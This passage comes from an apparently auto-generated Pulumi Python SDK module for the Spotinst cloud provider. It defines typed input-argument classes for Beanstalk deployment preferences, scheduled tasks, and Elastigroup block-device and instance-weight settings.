'ElastigroupItfLoadBalancerListenerRuleArgs',
'ElastigroupItfTargetGroupConfigArgs',
'ElastigroupItfTargetGroupConfigMatcherArgs',
'ElastigroupItfTargetGroupConfigTagArgs',
'ElastigroupMetadataOptionsArgs',
'ElastigroupMultaiTargetSetArgs',
'ElastigroupMultipleMetricsArgs',
'ElastigroupMultipleMetricsExpressionArgs',
'ElastigroupMultipleMetricsMetricArgs',
'ElastigroupMultipleMetricsMetricDimensionArgs',
'ElastigroupNetworkInterfaceArgs',
'ElastigroupResourceTagSpecificationArgs',
'ElastigroupRevertToSpotArgs',
'ElastigroupScalingDownPolicyArgs',
'ElastigroupScalingDownPolicyDimensionArgs',
'ElastigroupScalingDownPolicyStepAdjustmentArgs',
'ElastigroupScalingDownPolicyStepAdjustmentActionArgs',
'ElastigroupScalingStrategyArgs',
'ElastigroupScalingTargetPolicyArgs',
'ElastigroupScalingTargetPolicyDimensionArgs',
'ElastigroupScalingUpPolicyArgs',
'ElastigroupScalingUpPolicyDimensionArgs',
'ElastigroupScalingUpPolicyStepAdjustmentArgs',
'ElastigroupScalingUpPolicyStepAdjustmentActionArgs',
'ElastigroupScheduledTaskArgs',
'ElastigroupSignalArgs',
'ElastigroupStatefulDeallocationArgs',
'ElastigroupStatefulInstanceActionArgs',
'ElastigroupTagArgs',
'ElastigroupUpdatePolicyArgs',
'ElastigroupUpdatePolicyRollConfigArgs',
'ElastigroupUpdatePolicyRollConfigStrategyArgs',
'ElastigroupUpdatePolicyRollConfigStrategyOnFailureArgs',
'ManagedInstanceBlockDeviceMappingArgs',
'ManagedInstanceBlockDeviceMappingEbsArgs',
'ManagedInstanceIntegrationRoute53Args',
'ManagedInstanceIntegrationRoute53DomainArgs',
'ManagedInstanceIntegrationRoute53DomainRecordSetArgs',
'ManagedInstanceLoadBalancerArgs',
'ManagedInstanceManagedInstanceActionArgs',
'ManagedInstanceNetworkInterfaceArgs',
'ManagedInstanceResourceTagSpecificationArgs',
'ManagedInstanceRevertToSpotArgs',
'ManagedInstanceScheduledTaskArgs',
'ManagedInstanceTagArgs',
'MrScalarApplicationArgs',
'MrScalarBootstrapActionsFileArgs',
'MrScalarConfigurationsFileArgs',
'MrScalarCoreEbsBlockDeviceArgs',
'MrScalarCoreScalingDownPolicyArgs',
'MrScalarCoreScalingUpPolicyArgs',
'MrScalarInstanceWeightArgs',
'MrScalarMasterEbsBlockDeviceArgs',
'MrScalarProvisioningTimeoutArgs',
'MrScalarScheduledTaskArgs',
'MrScalarStepsFileArgs',
'MrScalarTagArgs',
'MrScalarTaskEbsBlockDeviceArgs',
'MrScalarTaskScalingDownPolicyArgs',
'MrScalarTaskScalingUpPolicyArgs',
'MrScalarTerminationPolicyArgs',
'MrScalarTerminationPolicyStatementArgs',
'OceanAutoscalerArgs',
'OceanAutoscalerAutoscaleDownArgs',
'OceanAutoscalerAutoscaleHeadroomArgs',
'OceanAutoscalerResourceLimitsArgs',
'OceanInstanceMetadataOptionsArgs',
'OceanLaunchSpecAutoscaleHeadroomArgs',
'OceanLaunchSpecBlockDeviceMappingArgs',
'OceanLaunchSpecBlockDeviceMappingEbsArgs',
'OceanLaunchSpecBlockDeviceMappingEbsDynamicVolumeSizeArgs',
'OceanLaunchSpecCreateOptionsArgs',
'OceanLaunchSpecDeleteOptionsArgs',
'OceanLaunchSpecElasticIpPoolArgs',
'OceanLaunchSpecElasticIpPoolTagSelectorArgs',
'OceanLaunchSpecLabelArgs',
'OceanLaunchSpecResourceLimitArgs',
'OceanLaunchSpecSchedulingTaskArgs',
'OceanLaunchSpecSchedulingTaskTaskHeadroomArgs',
'OceanLaunchSpecStrategyArgs',
'OceanLaunchSpecTagArgs',
'OceanLaunchSpecTaintArgs',
'OceanLaunchSpecUpdatePolicyArgs',
'OceanLaunchSpecUpdatePolicyRollConfigArgs',
'OceanLoadBalancerArgs',
'OceanLoggingArgs',
'OceanLoggingExportArgs',
'OceanLoggingExportS3Args',
'OceanScheduledTaskArgs',
'OceanScheduledTaskShutdownHoursArgs',
'OceanScheduledTaskTaskArgs',
'OceanTagArgs',
'OceanUpdatePolicyArgs',
'OceanUpdatePolicyRollConfigArgs',
'SuspensionSuspensionArgs',
]
@pulumi.input_type
class BeanstalkDeploymentPreferencesArgs:
    """Input arguments describing Beanstalk deployment preferences.

    Every field is optional; the constructor records only values that are
    not ``None`` on the instance via ``pulumi.set``.
    NOTE(review): generated by the Pulumi Terraform Bridge (tfgen) — do not
    hand-edit logic; regenerate instead.
    """

    def __init__(__self__, *,
                 automatic_roll: Optional[pulumi.Input[bool]] = None,
                 batch_size_percentage: Optional[pulumi.Input[int]] = None,
                 grace_period: Optional[pulumi.Input[int]] = None,
                 strategies: Optional[pulumi.Input[Sequence[pulumi.Input['BeanstalkDeploymentPreferencesStrategyArgs']]]] = None):
        """
        :param pulumi.Input[bool] automatic_roll: Should roll perform automatically
        :param pulumi.Input[int] batch_size_percentage: Percent size of each batch
        :param pulumi.Input[int] grace_period: Amount of time to wait between batches
        :param pulumi.Input[Sequence[pulumi.Input['BeanstalkDeploymentPreferencesStrategyArgs']]] strategies: Strategy parameters
        """
        # Only record arguments that were explicitly provided.
        if automatic_roll is not None:
            pulumi.set(__self__, "automatic_roll", automatic_roll)
        if batch_size_percentage is not None:
            pulumi.set(__self__, "batch_size_percentage", batch_size_percentage)
        if grace_period is not None:
            pulumi.set(__self__, "grace_period", grace_period)
        if strategies is not None:
            pulumi.set(__self__, "strategies", strategies)

    @property
    @pulumi.getter(name="automaticRoll")
    def automatic_roll(self) -> Optional[pulumi.Input[bool]]:
        """
        Should roll perform automatically
        """
        return pulumi.get(self, "automatic_roll")

    @automatic_roll.setter
    def automatic_roll(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "automatic_roll", value)

    @property
    @pulumi.getter(name="batchSizePercentage")
    def batch_size_percentage(self) -> Optional[pulumi.Input[int]]:
        """
        Percent size of each batch
        """
        return pulumi.get(self, "batch_size_percentage")

    @batch_size_percentage.setter
    def batch_size_percentage(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "batch_size_percentage", value)

    @property
    @pulumi.getter(name="gracePeriod")
    def grace_period(self) -> Optional[pulumi.Input[int]]:
        """
        Amount of time to wait between batches
        """
        return pulumi.get(self, "grace_period")

    @grace_period.setter
    def grace_period(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "grace_period", value)

    @property
    @pulumi.getter
    def strategies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['BeanstalkDeploymentPreferencesStrategyArgs']]]]:
        """
        Strategy parameters
        """
        return pulumi.get(self, "strategies")

    @strategies.setter
    def strategies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['BeanstalkDeploymentPreferencesStrategyArgs']]]]):
        pulumi.set(self, "strategies", value)
@pulumi.input_type
class BeanstalkDeploymentPreferencesStrategyArgs:
    """Input arguments for one Beanstalk deployment-preference strategy.

    Both fields are optional; the constructor records only values that are
    not ``None`` via ``pulumi.set``.
    NOTE(review): generated by the Pulumi Terraform Bridge (tfgen) — do not
    hand-edit logic; regenerate instead.
    """

    def __init__(__self__, *,
                 action: Optional[pulumi.Input[str]] = None,
                 should_drain_instances: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input[str] action: Action to take
        :param pulumi.Input[bool] should_drain_instances: Bool value if to wait to drain instance
        """
        # Only record arguments that were explicitly provided.
        if action is not None:
            pulumi.set(__self__, "action", action)
        if should_drain_instances is not None:
            pulumi.set(__self__, "should_drain_instances", should_drain_instances)

    @property
    @pulumi.getter
    def action(self) -> Optional[pulumi.Input[str]]:
        """
        Action to take
        """
        return pulumi.get(self, "action")

    @action.setter
    def action(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "action", value)

    @property
    @pulumi.getter(name="shouldDrainInstances")
    def should_drain_instances(self) -> Optional[pulumi.Input[bool]]:
        """
        Bool value if to wait to drain instance
        """
        return pulumi.get(self, "should_drain_instances")

    @should_drain_instances.setter
    def should_drain_instances(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "should_drain_instances", value)
@pulumi.input_type
class BeanstalkManagedActionsArgs:
    """Input arguments wrapping Beanstalk managed actions.

    The single ``platform_update`` field is optional; it is recorded via
    ``pulumi.set`` only when not ``None``.
    NOTE(review): generated by the Pulumi Terraform Bridge (tfgen) — do not
    hand-edit logic; regenerate instead.
    """

    def __init__(__self__, *,
                 platform_update: Optional[pulumi.Input['BeanstalkManagedActionsPlatformUpdateArgs']] = None):
        """
        :param pulumi.Input['BeanstalkManagedActionsPlatformUpdateArgs'] platform_update: Platform Update parameters
        """
        # Only record the argument when explicitly provided.
        if platform_update is not None:
            pulumi.set(__self__, "platform_update", platform_update)

    @property
    @pulumi.getter(name="platformUpdate")
    def platform_update(self) -> Optional[pulumi.Input['BeanstalkManagedActionsPlatformUpdateArgs']]:
        """
        Platform Update parameters
        """
        return pulumi.get(self, "platform_update")

    @platform_update.setter
    def platform_update(self, value: Optional[pulumi.Input['BeanstalkManagedActionsPlatformUpdateArgs']]):
        pulumi.set(self, "platform_update", value)
@pulumi.input_type
class BeanstalkManagedActionsPlatformUpdateArgs:
    """Input arguments for a Beanstalk managed platform update.

    All fields are optional; the constructor records only values that are
    not ``None`` via ``pulumi.set``.
    NOTE(review): generated by the Pulumi Terraform Bridge (tfgen) — do not
    hand-edit logic; regenerate instead.
    """

    def __init__(__self__, *,
                 perform_at: Optional[pulumi.Input[str]] = None,
                 time_window: Optional[pulumi.Input[str]] = None,
                 update_level: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] perform_at: Actions to perform (options: timeWindow, never)
        :param pulumi.Input[str] time_window: Time Window for when action occurs ex. Mon:23:50-Tue:00:20
        :param pulumi.Input[str] update_level: - Level to update
        """
        # Only record arguments that were explicitly provided.
        if perform_at is not None:
            pulumi.set(__self__, "perform_at", perform_at)
        if time_window is not None:
            pulumi.set(__self__, "time_window", time_window)
        if update_level is not None:
            pulumi.set(__self__, "update_level", update_level)

    @property
    @pulumi.getter(name="performAt")
    def perform_at(self) -> Optional[pulumi.Input[str]]:
        """
        Actions to perform (options: timeWindow, never)
        """
        return pulumi.get(self, "perform_at")

    @perform_at.setter
    def perform_at(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "perform_at", value)

    @property
    @pulumi.getter(name="timeWindow")
    def time_window(self) -> Optional[pulumi.Input[str]]:
        """
        Time Window for when action occurs ex. Mon:23:50-Tue:00:20
        """
        return pulumi.get(self, "time_window")

    @time_window.setter
    def time_window(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "time_window", value)

    @property
    @pulumi.getter(name="updateLevel")
    def update_level(self) -> Optional[pulumi.Input[str]]:
        """
        - Level to update
        """
        return pulumi.get(self, "update_level")

    @update_level.setter
    def update_level(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "update_level", value)
@pulumi.input_type
class BeanstalkScheduledTaskArgs:
    """A scheduled task attached to a Beanstalk-managed Elastigroup."""

    def __init__(__self__, *,
                 task_type: pulumi.Input[str],
                 adjustment: Optional[pulumi.Input[str]] = None,
                 adjustment_percentage: Optional[pulumi.Input[str]] = None,
                 batch_size_percentage: Optional[pulumi.Input[str]] = None,
                 cron_expression: Optional[pulumi.Input[str]] = None,
                 frequency: Optional[pulumi.Input[str]] = None,
                 grace_period: Optional[pulumi.Input[str]] = None,
                 is_enabled: Optional[pulumi.Input[bool]] = None,
                 max_capacity: Optional[pulumi.Input[str]] = None,
                 min_capacity: Optional[pulumi.Input[str]] = None,
                 scale_max_capacity: Optional[pulumi.Input[str]] = None,
                 scale_min_capacity: Optional[pulumi.Input[str]] = None,
                 scale_target_capacity: Optional[pulumi.Input[str]] = None,
                 start_time: Optional[pulumi.Input[str]] = None,
                 target_capacity: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] task_type: The task type to run. Supported task types are: `"scale"`, `"backup_ami"`, `"roll"`, `"scaleUp"`, `"percentageScaleUp"`, `"scaleDown"`, `"percentageScaleDown"`, `"statefulUpdateCapacity"`.
        :param pulumi.Input[str] adjustment: The number of instances to add or remove.
        :param pulumi.Input[str] adjustment_percentage: The percentage of instances to add or remove.
        :param pulumi.Input[str] batch_size_percentage: The percentage size of each batch in the scheduled deployment roll.
        :param pulumi.Input[str] cron_expression: A valid cron expression. The cron is running in UTC time zone and is in [Unix cron format](https://en.wikipedia.org/wiki/Cron).
        :param pulumi.Input[str] frequency: The recurrence frequency to run this task. Supported values are `"hourly"`, `"daily"`, `"weekly"` and `"continuous"`.
        :param pulumi.Input[str] grace_period: The period of time (seconds) to wait before checking a batch's health after it's deployment.
        :param pulumi.Input[bool] is_enabled: Setting the task to being enabled or disabled.
        :param pulumi.Input[str] max_capacity: The maximum number of instances the group should have.
        :param pulumi.Input[str] min_capacity: The minimum number of instances the group should have.
        :param pulumi.Input[str] scale_max_capacity: The maximum number of instances the group should have.
        :param pulumi.Input[str] scale_min_capacity: The minimum number of instances the group should have.
        :param pulumi.Input[str] scale_target_capacity: The desired number of instances the group should have.
        :param pulumi.Input[str] start_time: Set a start time for one time tasks.
        :param pulumi.Input[str] target_capacity: The desired number of instances the group should have.
        """
        # task_type is mandatory; everything else is stored only when supplied.
        pulumi.set(__self__, "task_type", task_type)
        for attr_name, attr_value in (
                ("adjustment", adjustment),
                ("adjustment_percentage", adjustment_percentage),
                ("batch_size_percentage", batch_size_percentage),
                ("cron_expression", cron_expression),
                ("frequency", frequency),
                ("grace_period", grace_period),
                ("is_enabled", is_enabled),
                ("max_capacity", max_capacity),
                ("min_capacity", min_capacity),
                ("scale_max_capacity", scale_max_capacity),
                ("scale_min_capacity", scale_min_capacity),
                ("scale_target_capacity", scale_target_capacity),
                ("start_time", start_time),
                ("target_capacity", target_capacity)):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="taskType")
    def task_type(self) -> pulumi.Input[str]:
        """The task type to run, e.g. `"scale"`, `"backup_ami"`, `"roll"`, `"scaleUp"`, `"percentageScaleUp"`, `"scaleDown"`, `"percentageScaleDown"`, `"statefulUpdateCapacity"`."""
        return pulumi.get(self, "task_type")

    @task_type.setter
    def task_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "task_type", value)

    @property
    @pulumi.getter
    def adjustment(self) -> Optional[pulumi.Input[str]]:
        """The number of instances to add or remove."""
        return pulumi.get(self, "adjustment")

    @adjustment.setter
    def adjustment(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "adjustment", value)

    @property
    @pulumi.getter(name="adjustmentPercentage")
    def adjustment_percentage(self) -> Optional[pulumi.Input[str]]:
        """The percentage of instances to add or remove."""
        return pulumi.get(self, "adjustment_percentage")

    @adjustment_percentage.setter
    def adjustment_percentage(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "adjustment_percentage", value)

    @property
    @pulumi.getter(name="batchSizePercentage")
    def batch_size_percentage(self) -> Optional[pulumi.Input[str]]:
        """The percentage size of each batch in the scheduled deployment roll."""
        return pulumi.get(self, "batch_size_percentage")

    @batch_size_percentage.setter
    def batch_size_percentage(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "batch_size_percentage", value)

    @property
    @pulumi.getter(name="cronExpression")
    def cron_expression(self) -> Optional[pulumi.Input[str]]:
        """A valid cron expression, evaluated in the UTC time zone, in [Unix cron format](https://en.wikipedia.org/wiki/Cron)."""
        return pulumi.get(self, "cron_expression")

    @cron_expression.setter
    def cron_expression(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cron_expression", value)

    @property
    @pulumi.getter
    def frequency(self) -> Optional[pulumi.Input[str]]:
        """The recurrence frequency: `"hourly"`, `"daily"`, `"weekly"` or `"continuous"`."""
        return pulumi.get(self, "frequency")

    @frequency.setter
    def frequency(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "frequency", value)

    @property
    @pulumi.getter(name="gracePeriod")
    def grace_period(self) -> Optional[pulumi.Input[str]]:
        """Seconds to wait before checking a batch's health after its deployment."""
        return pulumi.get(self, "grace_period")

    @grace_period.setter
    def grace_period(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "grace_period", value)

    @property
    @pulumi.getter(name="isEnabled")
    def is_enabled(self) -> Optional[pulumi.Input[bool]]:
        """Whether the task is enabled."""
        return pulumi.get(self, "is_enabled")

    @is_enabled.setter
    def is_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_enabled", value)

    @property
    @pulumi.getter(name="maxCapacity")
    def max_capacity(self) -> Optional[pulumi.Input[str]]:
        """The maximum number of instances the group should have."""
        return pulumi.get(self, "max_capacity")

    @max_capacity.setter
    def max_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "max_capacity", value)

    @property
    @pulumi.getter(name="minCapacity")
    def min_capacity(self) -> Optional[pulumi.Input[str]]:
        """The minimum number of instances the group should have."""
        return pulumi.get(self, "min_capacity")

    @min_capacity.setter
    def min_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "min_capacity", value)

    @property
    @pulumi.getter(name="scaleMaxCapacity")
    def scale_max_capacity(self) -> Optional[pulumi.Input[str]]:
        """The maximum number of instances the group should have."""
        return pulumi.get(self, "scale_max_capacity")

    @scale_max_capacity.setter
    def scale_max_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "scale_max_capacity", value)

    @property
    @pulumi.getter(name="scaleMinCapacity")
    def scale_min_capacity(self) -> Optional[pulumi.Input[str]]:
        """The minimum number of instances the group should have."""
        return pulumi.get(self, "scale_min_capacity")

    @scale_min_capacity.setter
    def scale_min_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "scale_min_capacity", value)

    @property
    @pulumi.getter(name="scaleTargetCapacity")
    def scale_target_capacity(self) -> Optional[pulumi.Input[str]]:
        """The desired number of instances the group should have."""
        return pulumi.get(self, "scale_target_capacity")

    @scale_target_capacity.setter
    def scale_target_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "scale_target_capacity", value)

    @property
    @pulumi.getter(name="startTime")
    def start_time(self) -> Optional[pulumi.Input[str]]:
        """Start time for one-time tasks."""
        return pulumi.get(self, "start_time")

    @start_time.setter
    def start_time(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "start_time", value)

    @property
    @pulumi.getter(name="targetCapacity")
    def target_capacity(self) -> Optional[pulumi.Input[str]]:
        """The desired number of instances the group should have."""
        return pulumi.get(self, "target_capacity")

    @target_capacity.setter
    def target_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "target_capacity", value)
@pulumi.input_type
class ElastigroupCpuOptionsArgs:
    """CPU options for Elastigroup instances."""

    def __init__(__self__, *,
                 threads_per_core: pulumi.Input[int]):
        """
        :param pulumi.Input[int] threads_per_core: The ability to define the number of threads per core in instances that allow this.
        """
        pulumi.set(__self__, "threads_per_core", threads_per_core)

    @property
    @pulumi.getter(name="threadsPerCore")
    def threads_per_core(self) -> pulumi.Input[int]:
        """Number of threads per core, for instance types that allow configuring it."""
        return pulumi.get(self, "threads_per_core")

    @threads_per_core.setter
    def threads_per_core(self, value: pulumi.Input[int]):
        pulumi.set(self, "threads_per_core", value)
@pulumi.input_type
class ElastigroupEbsBlockDeviceArgs:
    """An EBS block-device mapping for Elastigroup instances."""

    def __init__(__self__, *,
                 device_name: pulumi.Input[str],
                 delete_on_termination: Optional[pulumi.Input[bool]] = None,
                 encrypted: Optional[pulumi.Input[bool]] = None,
                 iops: Optional[pulumi.Input[int]] = None,
                 kms_key_id: Optional[pulumi.Input[str]] = None,
                 snapshot_id: Optional[pulumi.Input[str]] = None,
                 throughput: Optional[pulumi.Input[int]] = None,
                 volume_size: Optional[pulumi.Input[int]] = None,
                 volume_type: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] device_name: The name of the device to mount.
        :param pulumi.Input[bool] delete_on_termination: Whether the volume should be destroyed on instance termination.
        :param pulumi.Input[bool] encrypted: Enables [EBS encryption](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html) on the volume.
        :param pulumi.Input[int] iops: The amount of provisioned [IOPS](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-io-characteristics.html). This must be set with a `volume_type` of `"io1"`.
        :param pulumi.Input[str] kms_key_id: ID for a user managed CMK under which the EBS Volume is encrypted
        :param pulumi.Input[str] snapshot_id: The Snapshot ID to mount.
        :param pulumi.Input[int] throughput: The amount of data transferred to or from a storage device per second, you can use this param just in a case that `volume_type` = gp3.
        :param pulumi.Input[int] volume_size: The size of the volume in gigabytes.
        :param pulumi.Input[str] volume_type: The type of volume. Can be `"standard"`, `"gp2"`, `"io1"`, `"st1"` or `"sc1"`.
        """
        # device_name is mandatory; remaining settings are stored only when supplied.
        pulumi.set(__self__, "device_name", device_name)
        for attr_name, attr_value in (
                ("delete_on_termination", delete_on_termination),
                ("encrypted", encrypted),
                ("iops", iops),
                ("kms_key_id", kms_key_id),
                ("snapshot_id", snapshot_id),
                ("throughput", throughput),
                ("volume_size", volume_size),
                ("volume_type", volume_type)):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="deviceName")
    def device_name(self) -> pulumi.Input[str]:
        """The name of the device to mount."""
        return pulumi.get(self, "device_name")

    @device_name.setter
    def device_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "device_name", value)

    @property
    @pulumi.getter(name="deleteOnTermination")
    def delete_on_termination(self) -> Optional[pulumi.Input[bool]]:
        """Whether the volume should be destroyed on instance termination."""
        return pulumi.get(self, "delete_on_termination")

    @delete_on_termination.setter
    def delete_on_termination(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "delete_on_termination", value)

    @property
    @pulumi.getter
    def encrypted(self) -> Optional[pulumi.Input[bool]]:
        """Enables [EBS encryption](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html) on the volume."""
        return pulumi.get(self, "encrypted")

    @encrypted.setter
    def encrypted(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "encrypted", value)

    @property
    @pulumi.getter
    def iops(self) -> Optional[pulumi.Input[int]]:
        """Provisioned [IOPS](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-io-characteristics.html); must be set with a `volume_type` of `"io1"`."""
        return pulumi.get(self, "iops")

    @iops.setter
    def iops(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "iops", value)

    @property
    @pulumi.getter(name="kmsKeyId")
    def kms_key_id(self) -> Optional[pulumi.Input[str]]:
        """ID of a user-managed CMK under which the EBS volume is encrypted."""
        return pulumi.get(self, "kms_key_id")

    @kms_key_id.setter
    def kms_key_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "kms_key_id", value)

    @property
    @pulumi.getter(name="snapshotId")
    def snapshot_id(self) -> Optional[pulumi.Input[str]]:
        """The Snapshot ID to mount."""
        return pulumi.get(self, "snapshot_id")

    @snapshot_id.setter
    def snapshot_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "snapshot_id", value)

    @property
    @pulumi.getter
    def throughput(self) -> Optional[pulumi.Input[int]]:
        """Data transferred to or from the storage device per second; only usable when `volume_type` = gp3."""
        return pulumi.get(self, "throughput")

    @throughput.setter
    def throughput(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "throughput", value)

    @property
    @pulumi.getter(name="volumeSize")
    def volume_size(self) -> Optional[pulumi.Input[int]]:
        """The size of the volume in gigabytes."""
        return pulumi.get(self, "volume_size")

    @volume_size.setter
    def volume_size(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "volume_size", value)

    @property
    @pulumi.getter(name="volumeType")
    def volume_type(self) -> Optional[pulumi.Input[str]]:
        """The type of volume: `"standard"`, `"gp2"`, `"io1"`, `"st1"` or `"sc1"`."""
        return pulumi.get(self, "volume_type")

    @volume_type.setter
    def volume_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "volume_type", value)
@pulumi.input_type
class ElastigroupEphemeralBlockDeviceArgs:
    """An ephemeral (instance-store) block-device mapping."""

    def __init__(__self__, *,
                 device_name: pulumi.Input[str],
                 virtual_name: pulumi.Input[str]):
        """
        :param pulumi.Input[str] device_name: The name of the block device to mount on the instance.
        :param pulumi.Input[str] virtual_name: The [Instance Store Device Name](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/InstanceStorage.html#InstanceStoreDeviceNames)
               (e.g. `"ephemeral0"`).
        """
        # Both arguments are required.
        for attr_name, attr_value in (("device_name", device_name),
                                      ("virtual_name", virtual_name)):
            pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="deviceName")
    def device_name(self) -> pulumi.Input[str]:
        """The name of the block device to mount on the instance."""
        return pulumi.get(self, "device_name")

    @device_name.setter
    def device_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "device_name", value)

    @property
    @pulumi.getter(name="virtualName")
    def virtual_name(self) -> pulumi.Input[str]:
        """The [Instance Store Device Name](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/InstanceStorage.html#InstanceStoreDeviceNames), e.g. `"ephemeral0"`."""
        return pulumi.get(self, "virtual_name")

    @virtual_name.setter
    def virtual_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "virtual_name", value)
@pulumi.input_type
class ElastigroupInstanceTypesWeightArgs:
    """A per-instance-type weight used in weighted capacity calculations."""

    def __init__(__self__, *,
                 instance_type: pulumi.Input[str],
                 weight: pulumi.Input[int]):
        """
        :param pulumi.Input[str] instance_type: Name of instance type (String).
        :param pulumi.Input[int] weight: Weight per instance type (Integer).
        """
        # Both arguments are required.
        for attr_name, attr_value in (("instance_type", instance_type),
                                      ("weight", weight)):
            pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="instanceType")
    def instance_type(self) -> pulumi.Input[str]:
        """Name of instance type (String)."""
        return pulumi.get(self, "instance_type")

    @instance_type.setter
    def instance_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "instance_type", value)

    @property
    @pulumi.getter
    def weight(self) -> pulumi.Input[int]:
        """Weight per instance type (Integer)."""
        return pulumi.get(self, "weight")

    @weight.setter
    def weight(self, value: pulumi.Input[int]):
        pulumi.set(self, "weight", value)
@pulumi.input_type
class ElastigroupIntegrationBeanstalkArgs:
    """Elastic Beanstalk integration settings for an Elastigroup."""

    def __init__(__self__, *,
                 deployment_preferences: Optional[pulumi.Input['ElastigroupIntegrationBeanstalkDeploymentPreferencesArgs']] = None,
                 environment_id: Optional[pulumi.Input[str]] = None,
                 managed_actions: Optional[pulumi.Input['ElastigroupIntegrationBeanstalkManagedActionsArgs']] = None):
        """
        :param pulumi.Input['ElastigroupIntegrationBeanstalkDeploymentPreferencesArgs'] deployment_preferences: Preferences when performing a roll
        :param pulumi.Input['ElastigroupIntegrationBeanstalkManagedActionsArgs'] managed_actions: Managed Actions parameters
        """
        # Register only the arguments the caller actually supplied.
        for attr_name, attr_value in (
                ("deployment_preferences", deployment_preferences),
                ("environment_id", environment_id),
                ("managed_actions", managed_actions)):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="deploymentPreferences")
    def deployment_preferences(self) -> Optional[pulumi.Input['ElastigroupIntegrationBeanstalkDeploymentPreferencesArgs']]:
        """Preferences when performing a roll."""
        return pulumi.get(self, "deployment_preferences")

    @deployment_preferences.setter
    def deployment_preferences(self, value: Optional[pulumi.Input['ElastigroupIntegrationBeanstalkDeploymentPreferencesArgs']]):
        pulumi.set(self, "deployment_preferences", value)

    @property
    @pulumi.getter(name="environmentId")
    def environment_id(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "environment_id")

    @environment_id.setter
    def environment_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "environment_id", value)

    @property
    @pulumi.getter(name="managedActions")
    def managed_actions(self) -> Optional[pulumi.Input['ElastigroupIntegrationBeanstalkManagedActionsArgs']]:
        """Managed Actions parameters."""
        return pulumi.get(self, "managed_actions")

    @managed_actions.setter
    def managed_actions(self, value: Optional[pulumi.Input['ElastigroupIntegrationBeanstalkManagedActionsArgs']]):
        pulumi.set(self, "managed_actions", value)
@pulumi.input_type
class ElastigroupIntegrationBeanstalkDeploymentPreferencesArgs:
    """Roll (deployment) preferences for the Beanstalk integration."""

    def __init__(__self__, *,
                 automatic_roll: Optional[pulumi.Input[bool]] = None,
                 batch_size_percentage: Optional[pulumi.Input[int]] = None,
                 grace_period: Optional[pulumi.Input[int]] = None,
                 strategy: Optional[pulumi.Input['ElastigroupIntegrationBeanstalkDeploymentPreferencesStrategyArgs']] = None):
        """
        :param pulumi.Input[bool] automatic_roll: Should roll perform automatically
        :param pulumi.Input[int] batch_size_percentage: Sets the percentage of the instances to deploy in each batch.
        :param pulumi.Input[int] grace_period: Sets the grace period for new instances to become healthy.
        :param pulumi.Input['ElastigroupIntegrationBeanstalkDeploymentPreferencesStrategyArgs'] strategy: Strategy parameters
        """
        # Register only the arguments the caller actually supplied.
        for attr_name, attr_value in (
                ("automatic_roll", automatic_roll),
                ("batch_size_percentage", batch_size_percentage),
                ("grace_period", grace_period),
                ("strategy", strategy)):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="automaticRoll")
    def automatic_roll(self) -> Optional[pulumi.Input[bool]]:
        """Should the roll be performed automatically."""
        return pulumi.get(self, "automatic_roll")

    @automatic_roll.setter
    def automatic_roll(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "automatic_roll", value)

    @property
    @pulumi.getter(name="batchSizePercentage")
